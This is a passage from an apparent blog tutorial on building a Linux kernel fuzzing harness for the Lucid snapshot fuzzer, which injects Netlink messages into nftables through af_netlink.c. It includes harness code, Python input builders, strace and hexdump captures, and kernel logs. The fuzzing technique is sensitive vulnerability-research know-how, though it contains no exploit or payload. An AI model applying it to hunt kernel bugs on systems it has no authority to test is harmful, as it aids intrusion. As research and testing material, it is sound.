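	<span class="n">u32</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>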

	<span class="n">printk</span><span class="p">(</span><span class="s">"Hello from lucid_fuzz_handle_input</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="cm">/** LUCID TAKES SNAPSHOT HERE **/</span>
	<span class="c1">// This special NOP instruction, when interpreted by Bochs will cause</span>
	<span class="c1">// Bochs to save a snapshot of its state to disk that Lucid will be able</span>
	<span class="c1">// to resume in its purpose built version of Bochs called `lucid-bochs`</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %dx, %dx"</span><span class="p">);</span>

	<span class="c1">// Make sure we have enough bytes to construct the input metadata</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">&lt;</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">lf_input</span><span class="p">))</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Cast the data to our metadata struct</span>
	<span class="n">input</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="p">)</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span><span class="p">;</span>

	<span class="c1">// Sanity check the values</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">!=</span> <span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">||</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_INPUT_LEN</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Sanity check the number of envelopes</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="o">-&gt;</span><span class="n">num_envs</span> <span class="o">&gt;</span> <span class="n">LF_MAX_NUM_ENVS</span> <span class="o">||</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">num_envs</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Check how many remaining bytes we have, and subtract what we already</span>
	<span class="c1">// consumed with the input metadata</span>
	<span class="n">remaining</span> <span class="o">=</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span><span class="p">;</span>
	<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>

	<span class="c1">// Start tracking an offset into the byte buffer where we're reading from</span>
	<span class="n">offset</span> <span class="o">=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>
</code></pre></div></div>

<p>Then we can start iterating through envelopes and parsing them. Each successfully parsed envelope gets turned into an <code class="language-plaintext highlighter-rouge">skb</code> and dispatched to <code class="language-plaintext highlighter-rouge">nftables</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Iterate through the envelopes and parse each one</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">num_envs</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// Make sure we have enough data remaining to parse an envelope metadata</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">LF_ENV_HDR_SIZE</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// We can at least read the length field, and sanity check it</span>
		<span class="n">env</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="p">)(</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span> <span class="o">+</span> <span class="n">offset</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_ENV_LEN</span> <span class="o">||</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Consume those bytes</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_ENV_HDR_SIZE</span><span class="p">;</span>

		<span class="c1">// Make sure we can read that much data</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// We have enough data left, create the skb for this envelope</span>
		<span class="n">fuzz_skb</span> <span class="o">=</span> <span class="n">create_fuzz_skb</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">fuzz_skb</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Dispatch the fuzz_skb to nftables!</span>
		<span class="n">dispatch_skb</span><span class="p">(</span><span class="n">fuzz_skb</span><span class="p">);</span>

		<span class="c1">// Update our offset</span>
		<span class="n">offset</span> <span class="o">+=</span> <span class="p">(</span><span class="n">LF_ENV_HDR_SIZE</span> <span class="o">+</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">);</span>

		<span class="c1">// Update remaining</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>

	<span class="p">}</span>
</code></pre></div></div>
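<p>When crafting seed inputs by hand, it can help to run the same checks in userland before handing bytes to the kernel. Here is a minimal Python sketch of the envelope walk, under some assumptions: <code class="language-plaintext highlighter-rouge">walk_envelopes</code> is a hypothetical helper name (it is not part of Lucid), the limits are copied from the harness macros, and the check that an envelope header fits in the remaining bytes is my guess at what the harness does just before the code shown above:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import struct

# Limits copied from the harness macros
LF_MAX_NUM_ENVS = 24
LF_MAX_ENV_LEN = 8192
LF_INPUT_HDR_SIZE = 8  # lf_input total_len + num_envs
LF_ENV_HDR_SIZE = 4    # lf_envelope len
LF_MAX_INPUT_LEN = (LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS + LF_INPUT_HDR_SIZE

def walk_envelopes(buf):
    """Return the envelope payloads, or raise ValueError where the harness would bail."""
    if len(buf) &lt; LF_INPUT_HDR_SIZE:
        raise ValueError("too short for lf_input header")
    total_len, num_envs = struct.unpack_from('&lt;II', buf, 0)
    if total_len != len(buf) or total_len &gt; LF_MAX_INPUT_LEN:
        raise ValueError("bad total_len")
    if num_envs == 0 or num_envs &gt; LF_MAX_NUM_ENVS:
        raise ValueError("bad num_envs")

    offset = LF_INPUT_HDR_SIZE
    remaining = len(buf) - LF_INPUT_HDR_SIZE
    payloads = []
    for _ in range(num_envs):
        # Assumed check: the envelope header itself must fit
        if remaining &lt; LF_ENV_HDR_SIZE:
            raise ValueError("truncated envelope header")
        (env_len,) = struct.unpack_from('&lt;I', buf, offset)
        if env_len == 0 or env_len &gt; LF_MAX_ENV_LEN:
            raise ValueError("bad envelope length")
        # Consume the header, then make sure the payload fits
        remaining -= LF_ENV_HDR_SIZE
        if remaining &lt; env_len:
            raise ValueError("truncated envelope payload")
        start = offset + LF_ENV_HDR_SIZE
        payloads.append(buf[start:start + env_len])
        offset += LF_ENV_HDR_SIZE + env_len
        remaining -= env_len

    # Leftover bytes after the last envelope are an error, same as the harness
    if remaining:
        raise ValueError("trailing bytes")
    return payloads
</code></pre></div></div>

<p>One difference worth keeping in mind: the kernel harness dispatches each envelope as it goes, so a malformed third envelope still lets the first two reach the target, while this sketch rejects the whole input up front.</p>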

<p>We initialize the <code class="language-plaintext highlighter-rouge">fuzz_skb</code> in <code class="language-plaintext highlighter-rouge">create_fuzz_skb</code>. This is where we set the socket buffer up with everything it needs to be received and parsed by <code class="language-plaintext highlighter-rouge">nftables</code>. In effect, we swap the “envelope” wrapper for the socket buffer wrapper:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Creates a socket buffer filled with fuzz message</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">create_fuzz_skb</span><span class="p">(</span><span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="n">env</span><span class="p">,</span> <span class="kt">int</span> <span class="n">idx</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="c1">// Sanity check</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">idx</span> <span class="o">&gt;=</span> <span class="n">LF_MAX_NUM_ENVS</span><span class="p">)</span>
		<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="c1">// Grab socket buffer from global buf</span>
	<span class="n">skb</span> <span class="o">=</span> <span class="n">skbs</span><span class="p">[</span><span class="n">idx</span><span class="p">];</span>

	<span class="c1">// Set the socket buffer's sock to the kernel sock for Netfilter</span>
	<span class="n">skb</span><span class="o">-&gt;</span><span class="n">sk</span> <span class="o">=</span> <span class="n">kern_sock</span><span class="p">;</span>

	<span class="c1">// Inject fuzz data and set sizes</span>
	<span class="n">memcpy</span><span class="p">(</span><span class="n">skb_put</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">),</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">,</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">);</span>

	<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Dispatching the <code class="language-plaintext highlighter-rouge">skb</code> is simple: we cast the <code class="language-plaintext highlighter-rouge">handler</code> to the right function pointer signature and then invoke it with the skb:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Dispatches the skb to the appropriate netlink recv handler</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">dispatch_skb</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span> <span class="p">{</span>
	<span class="c1">// Create function pointer, msg-&gt;protocol already sane</span>
	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">rcv</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="p">)</span> <span class="o">=</span> <span class="n">handler</span><span class="p">;</span>

	<span class="c1">// Dispatch!</span>
	<span class="n">rcv</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The main fuzzing loop then of course restores the snapshot after we’re done parsing envelopes:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Done parsing envelopes, check if we have remaining bytes</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="cm">/** LUCID RESTORES SNAPSHOT **/</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %bx, %bx"</span><span class="p">);</span>

	<span class="c1">// Finally done</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>

<p>We’ll save the rest of the snippets for the source files I’ll post at the end.</p>

<h2 id="testing-harness">Testing Harness</h2>
<p>Everything is wired up, so now we can send inputs via the <code class="language-plaintext highlighter-rouge">harness</code> userland binary we compiled. Let’s check out <code class="language-plaintext highlighter-rouge">strace</code> on the <code class="language-plaintext highlighter-rouge">nft</code> userland utility and see where the Netlink message to create an <code class="language-plaintext highlighter-rouge">nft_table</code> is sent over the Netlink socket. Our <code class="language-plaintext highlighter-rouge">nft</code> command is: <code class="language-plaintext highlighter-rouge">nft add table inet fuzz</code>:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">// Create the Netlink socket of the protocol type NETLINK_NETFILTER
socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER) = 3

// Send the Netlink message to create a table over that socket fd we just created
sendto(3, [{nlmsg_len=20, nlmsg_type=NFNL_SUBSYS_NFTABLES&lt;&lt;8|NFT_MSG_GETGEN, nlmsg_flags=NLM_F_REQUEST, nlmsg_seq=0, nlmsg_pid=0}, {nfgen_family=AF_UNSPEC, version=NFNETLINK_V0, res_id=htons(0)}], 20, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000}, 12) = 20
recvmsg(3, {msg_name={sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000}, msg_namelen=12, msg_iov=[{iov_base=[{nlmsg_len=44, nlmsg_type=NFNL_SUBSYS_NFTABLES&lt;&lt;8|NFT_MSG_NEWGEN, nlmsg_flags=0, nlmsg_seq=0, nlmsg_pid=125392}, {nfgen_family=AF_UNSPEC, version=NFNETLINK_V0, res_id=htons(103)}, [[{nla_len=8, nla_type=0x1}, "\x00\x00\x00\x67"], [{nla_len=8, nla_type=0x2}, "\x00\x01\xe9\xd0"], [{nla_len=8, nla_type=0x3}, "\x6e\x66\x74\x00"]]], iov_len=69631}], msg_iovlen=1, msg_controllen=0, msg_flags=0}, 0) = 44
</span></code></pre></div></div>

<p>The message goes out via the <code class="language-plaintext highlighter-rouge">sendmsg</code> syscall, so I wrote an <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> shared object that hexdumps the iovec data passed to <code class="language-plaintext highlighter-rouge">sendmsg</code>. Now I can get <code class="language-plaintext highlighter-rouge">hexdump -C</code> style output for the <code class="language-plaintext highlighter-rouge">nft</code> message:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">LD_PRELOAD=$</span>PWD/hexdump_netlink.so nft add table inet fuzz
<span class="go">00000000  14 00 00 00 10 00 01 00  00 00 00 00 00 00 00 00 |................|
00000010  00 00 0a 00 28 00 00 00  00 0a 01 00 01 00 00 00 |....(...........|
00000020  00 00 00 00 01 00 00 00  09 00 01 00 66 75 7a 7a |............fuzz|
00000030  00 00 00 00 08 00 02 00  00 00 00 00 14 00 00 00 |................|
00000040  11 00 01 00 02 00 00 00  00 00 00 00 00 00 0a 00 |................|
</span></code></pre></div></div>
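<p>To sanity-check a dump like this, you can walk the Netlink headers in it. The following is a rough Python sketch, not part of the harness: <code class="language-plaintext highlighter-rouge">walk_nlmsgs</code> is a hypothetical helper, and it assumes the little-endian <code class="language-plaintext highlighter-rouge">nlmsghdr</code> layout (u32 length, u16 type, u16 flags, u32 sequence, u32 port ID) with 4-byte message alignment:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import struct

# The 80 bytes from the hexdump above
DUMP = bytes.fromhex(
    "14000000100001000000000000000000"
    "00000a0028000000000a010001000000"
    "00000000010000000900010066757a7a"
    "00000000080002000000000014000000"
    "11000100020000000000000000000a00"
)

# nlmsg_len, nlmsg_type, nlmsg_flags, nlmsg_seq, nlmsg_pid
NLMSG_HDR = struct.Struct('&lt;IHHII')

def walk_nlmsgs(data):
    """Yield (len, type, flags, seq, pid) for each Netlink message in data."""
    offset = 0
    while offset + NLMSG_HDR.size &lt;= len(data):
        hdr = NLMSG_HDR.unpack_from(data, offset)
        if hdr[0] &lt; NLMSG_HDR.size:
            break  # malformed length, stop walking
        yield hdr
        offset += (hdr[0] + 3) &amp; ~3  # round up to 4 bytes, like NLMSG_ALIGN

for nlmsg_len, nlmsg_type, flags, seq, pid in walk_nlmsgs(DUMP):
    # For nfnetlink, the high byte of the type is the subsystem, the low byte the message
    print(f"len={nlmsg_len} subsys={nlmsg_type &gt;&gt; 8} msg={nlmsg_type &amp; 0xff} seq={seq}")
</code></pre></div></div>

<p>On this dump the walk finds three messages: a 20-byte message of type <code class="language-plaintext highlighter-rouge">0x10</code>, a 40-byte message for subsystem 10 (nftables) carrying the <code class="language-plaintext highlighter-rouge">fuzz</code> table name, and a 20-byte message of type <code class="language-plaintext highlighter-rouge">0x11</code>. That matches a batch begin, the new-table request, and a batch end.</p>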

<p>Now we know what a legit <code class="language-plaintext highlighter-rouge">nftables</code> message looks like and we can wrap it in our <code class="language-plaintext highlighter-rouge">lf_input</code> and <code class="language-plaintext highlighter-rouge">lf_envelope</code> structures and test the harness! I took that output and just hardcoded it into a janky Python script to dump the binary to the terminal:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">struct</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="c1"># Dumped message
</span><span class="n">msg_str</span> <span class="o">=</span> <span class="p">[</span>
    <span class="s">"00000000  14 00 00 00 10 00 01 00  00 00 00 00 00 00 00 00 |................|"</span><span class="p">,</span>
    <span class="s">"00000010  00 00 0a 00 28 00 00 00  00 0a 01 00 01 00 00 00 |....(...........|"</span><span class="p">,</span>
    <span class="s">"00000020  00 00 00 00 01 00 00 00  09 00 01 00 66 75 7a 7a |............fuzz|"</span><span class="p">,</span>
    <span class="s">"00000030  00 00 00 00 08 00 02 00  00 00 00 00 14 00 00 00 |................|"</span><span class="p">,</span>
    <span class="s">"00000040  11 00 01 00 02 00 00 00  00 00 00 00 00 00 0a 00 |................|"</span>
<span class="p">]</span>

<span class="c1"># Byte string we'll fill
</span><span class="n">all_bytes</span> <span class="o">=</span> <span class="sa">b</span><span class="s">''</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">msg_str</span><span class="p">:</span>
    <span class="c1"># Skip the offset stuff
</span>    <span class="n">hex_start</span> <span class="o">=</span> <span class="n">line</span><span class="p">[</span><span class="mi">10</span><span class="p">:]</span>

    <span class="c1"># Cut off the back ascii stuff
</span>    <span class="n">hex_str</span> <span class="o">=</span> <span class="n">hex_start</span><span class="p">[:</span><span class="nb">len</span><span class="p">(</span><span class="n">hex_start</span><span class="p">)</span> <span class="o">-</span> <span class="mi">18</span><span class="p">]</span>

    <span class="c1"># Remove the spaces
</span>    <span class="n">hex_str</span> <span class="o">=</span> <span class="n">hex_str</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">" "</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span>

    <span class="c1"># Start appending
</span>    <span class="n">all_bytes</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">hex_str</span><span class="p">)</span>

<span class="c1"># Now with bytes, wrap that in envelope
</span><span class="n">envelope_len</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">all_bytes</span><span class="p">)</span>
<span class="n">envelope</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;I'</span><span class="p">,</span> <span class="n">envelope_len</span><span class="p">)</span> <span class="o">+</span> <span class="n">all_bytes</span>

<span class="c1"># Now wrap that in an lf_input
</span><span class="n">num_envs</span> <span class="o">=</span> <span class="mi">1</span>
<span class="n">total_len</span> <span class="o">=</span> <span class="mi">8</span> <span class="c1"># Metadata for lf_input
</span><span class="n">total_len</span> <span class="o">+=</span> <span class="nb">len</span><span class="p">(</span><span class="n">envelope</span><span class="p">)</span>
<span class="n">lf_input</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;II'</span><span class="p">,</span> <span class="n">total_len</span><span class="p">,</span> <span class="n">num_envs</span><span class="p">)</span> <span class="o">+</span> <span class="n">envelope</span>

<span class="c1"># Write that to stdout
</span><span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="nb">buffer</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">lf_input</span><span class="p">)</span>
</code></pre></div></div>
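<p>The script above wraps a single message. If you want an input with several envelopes, the same wrapping generalizes. This is a small sketch assuming the same layout as above (a 4-byte little-endian length per envelope, and 8 bytes of <code class="language-plaintext highlighter-rouge">lf_input</code> metadata); <code class="language-plaintext highlighter-rouge">build_lf_input</code> is a name I made up for illustration:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import struct

def build_lf_input(messages):
    """Wrap each message in an lf_envelope, then wrap them all in an lf_input."""
    # Each envelope is a u32 length followed by the raw message bytes
    body = b''.join(struct.pack('&lt;I', len(m)) + m for m in messages)

    # total_len counts the 8 bytes of lf_input metadata plus every envelope
    total_len = 8 + len(body)
    return struct.pack('&lt;II', total_len, len(messages)) + body
</code></pre></div></div>

<p>Calling <code class="language-plaintext highlighter-rouge">build_lf_input([all_bytes])</code> should produce the same bytes as the script above. Note that this sketch does not enforce the harness limits on envelope count or envelope size.</p>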

<p>We can now pipe that to <code class="language-plaintext highlighter-rouge">base64</code> and then pipe that to the harness for testing:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">[devbox:~/nft_fuzzing]$</span><span class="w"> </span>python3 wrapper.py | <span class="nb">base64</span>
<span class="go">XAAAAAEAAABQAAAAFAAAABAAAQAAAAAAAAAAAAAACgAoAAAAAAoBAAEAAAAAAAAAAQAAAAkAAQBmdXp6AAAAAAgAAgAAAAAAFAAAABEAAQACAAAAAAAAAAAACgA=
</span></code></pre></div></div>
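<p>Before sending the blob anywhere, a quick way to confirm the wrapping is right is to decode it and read the three length fields back. A minimal sketch, assuming the layout described above:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import base64
import struct

BLOB = (
    "XAAAAAEAAABQAAAAFAAAABAAAQAAAAAAAAAAAAAACgAoAAAAAAoBAAEAAAAAAAAA"
    "AQAAAAkAAQBmdXp6AAAAAAgAAgAAAAAAFAAAABEAAQACAAAAAAAAAAAACgA="
)

raw = base64.b64decode(BLOB)

# lf_input.total_len, lf_input.num_envs, then the first lf_envelope.len
total_len, num_envs, env_len = struct.unpack_from('&lt;III', raw, 0)
print(len(raw), total_len, num_envs, env_len)
</code></pre></div></div>

<p>Here <code class="language-plaintext highlighter-rouge">total_len</code> should equal the decoded length, and the envelope length should be the 80 bytes of the dumped message.</p>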

<p>Then when we run <code class="language-plaintext highlighter-rouge">echo "&lt;base64&gt;" | harness</code> on the <code class="language-plaintext highlighter-rouge">qemu-system</code> running our custom kernel, we get the following kernel logs:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">[   23.347957] Inside lucid fuzz!
[   23.349015] Calling lucid_fuzz_init...
[   23.350233] Hello from lucid_fuzz_init
[   23.351399] LF_MAX_INPUT_LEN is: 196712
[   23.355266] Hello from lucid_fuzz_handle_input
[   23.359789] Calling lucid_fuzz_cleanup...
lucid_fuzz returned 0
</span></code></pre></div></div>

<p>So the harness works!</p>
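<p>As a side check, the <code class="language-plaintext highlighter-rouge">LF_MAX_INPUT_LEN</code> value in the log lines up with the harness macros. Redoing the arithmetic in Python, with <code class="language-plaintext highlighter-rouge">sizeof(u32)</code> taken as 4:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Same names and values as the harness macros
LF_MAX_NUM_ENVS = 24
LF_MAX_ENV_LEN = 8192
LF_INPUT_HDR_SIZE = 4 * 2  # total_len, num_envs
LF_ENV_HDR_SIZE = 4        # len

LF_MAX_TOTAL_ENV = (LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS
LF_MAX_INPUT_LEN = LF_MAX_TOTAL_ENV + LF_INPUT_HDR_SIZE

print(LF_MAX_INPUT_LEN)  # 196712, same as the kernel log
</code></pre></div></div>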

<h2 id="conclusion">Conclusion</h2>
<p>Hopefully this helps you understand how to write a harness for Lucid. We needed to:</p>
<ol>
  <li>identify a way to inject raw input bytes into kernel memory</li>
  <li>take a snapshot with our special NOP instruction</li>
  <li>implement a custom protocol that our harness can understand so that it can parse the raw input bytes into something that can be sent to the target</li>
  <li>reset the snapshot with our special NOP instruction</li>
  <li>clean up all the resources in the harness so we can use it for debugging as well.</li>
</ol>

<p>I’ve pasted the full harness code that I added in <code class="language-plaintext highlighter-rouge">af_netlink.c</code> below, cheers:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*************** Start of Lucid Fuzzing Harness *****************************/</span>
<span class="cp">#define LF_MAX_NUM_ENVS 24UL // Number of envelopes in an input
#define LF_MAX_ENV_LEN 8192UL // Number of bytes in an envelope payload 
#define LF_INPUT_HDR_SIZE (sizeof(u32) * 2) // lf_input-&gt;total_len, num_envs
#define LF_ENV_HDR_SIZE (sizeof(u32)) // lf_envelope-&gt;len
#define LF_MAX_TOTAL_ENV ((LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS)
#define LF_MAX_INPUT_LEN (LF_MAX_TOTAL_ENV + LF_INPUT_HDR_SIZE)
</span>
<span class="c1">// Used by Lucid when scanning for where to inject the input </span>
<span class="cp">#define LUCID_SIGNATURE { 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, \
                          0x13, 0x38, 0x13, 0x38, 0x13, 0x38, 0x13, 0x38 }
</span>
<span class="c1">// Structure that describes an input as Lucid sees it</span>
<span class="k">struct</span> <span class="n">lf_fuzzcase</span> <span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">signature</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
	<span class="kt">size_t</span> <span class="n">input_len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">input</span><span class="p">[</span><span class="n">LF_MAX_INPUT_LEN</span><span class="p">];</span>
<span class="p">};</span>

<span class="c1">// Create instance of the struct</span>
<span class="k">struct</span> <span class="n">lf_fuzzcase</span> <span class="n">fc</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">signature</span> <span class="o">=</span> <span class="n">LUCID_SIGNATURE</span><span class="p">,</span>
	<span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
	<span class="p">.</span><span class="n">input</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">}</span>	<span class="cm">/* Where Lucid injects an input */</span>
<span class="p">};</span>

<span class="c1">// The function pointer we send the skbs to, the netlink rcv handler for</span>
<span class="c1">// netfilter nfnetlink_rcv</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">handler</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// The kernel-registered socket waiting for input from us</span>
<span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">kern_sock</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Pool of skbs we use to store data in envelopes</span>
<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skbs</span><span class="p">[</span><span class="n">LF_MAX_NUM_ENVS</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span> 

<span class="c1">// Our initialization function, called before we do any fuzzing</span>
<span class="kt">int</span> <span class="nf">lucid_fuzz_init</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">)</span> <span class="p">{</span>
	<span class="kt">int</span> <span class="n">err</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="n">printk</span><span class="p">(</span><span class="s">"Hello from lucid_fuzz_init</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">printk</span><span class="p">(</span><span class="s">"LF_MAX_INPUT_LEN is: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">LF_MAX_INPUT_LEN</span><span class="p">);</span>

	<span class="c1">// Copy the user data over to the fuzzcase instance if there is any</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">len</span> <span class="o">&lt;=</span> <span class="n">LF_MAX_INPUT_LEN</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span>
			<span class="n">fc</span><span class="p">.</span><span class="n">input</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">len</span>
		<span class="p">))</span>
		<span class="p">{</span>
			<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
			<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="n">len</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Doing this how other kernel code does it, lock the global table</span>
	<span class="n">netlink_table_grab</span><span class="p">();</span>

